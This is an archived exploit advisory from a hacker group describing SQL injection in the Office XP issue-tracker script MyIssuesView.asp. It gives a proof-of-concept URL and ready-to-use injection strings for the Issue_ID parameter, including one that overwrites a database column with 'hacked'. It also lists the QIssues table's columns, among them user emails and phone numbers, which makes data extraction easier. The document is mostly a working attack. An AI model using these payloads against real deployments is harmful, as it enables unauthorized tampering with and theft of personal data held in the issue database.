AOH :: HP Unsorted O :: BX2387.HTM

Office XP Remote SQL Injection



Office XP Remote SQL Injection
Office XP Remote SQL Injection



Aria-Security Team (Persian Security Network)=0D
http://forum.Aria-Security.com (ENGLISH FORUM!)=0D 
--------------------------------------------------=0D
Shoutz: Aura, Null, Kinglet=0D
Office XP Remote SQL Injection=0D
Vendor: vso-xp.com=0D
Vulnerable File: MyIssuesView.asp=0D
Original Adivosry: http://forum.aria-security.com/showthread.php?p=21=0D 
=0D
PoC:=0D
MyIssuesView.asp?Issue_ID=[SQL INJECTION]=0D
=0D
Examples:=0D
MyIssuesView.asp?Issue_ID=-1%20having%201=1--=0D
MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';--=0D
=0D
=0D
List of columns=0D
=0D
QIssues.Issue_ID,QIssues.UserID,QIssues.Date,QIssues.Synopsis,QIssues.Status,QIssues.Category,QIssues.Category_ID,QIssues.Status_ID,QIssues.Priority,QIssues.Staff_ID,QIssues.Description,QIssues.IssueDescription,QIssues.LastStatus_ID,QIssues.UserFullName,QIssues.StaffFullName,QIssues.StaffEmail,QIssues.Type,QIssues.Priority_ID,QIssues.Group_ID,QIssues.UserEmail,QIssues.GroupName,QIssues.UserPhone,QIssues.CloseDate,QIssues.BrowserAgent,QIssues.CompanyName,QIssues.FileName,QIssues.FilePath,QIssues.CustomFields,QIssues.CloseBy,QIssues.Age=0D
=0D
=0D
Aria-Security Team=0D
The-0utl4w=0D
=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.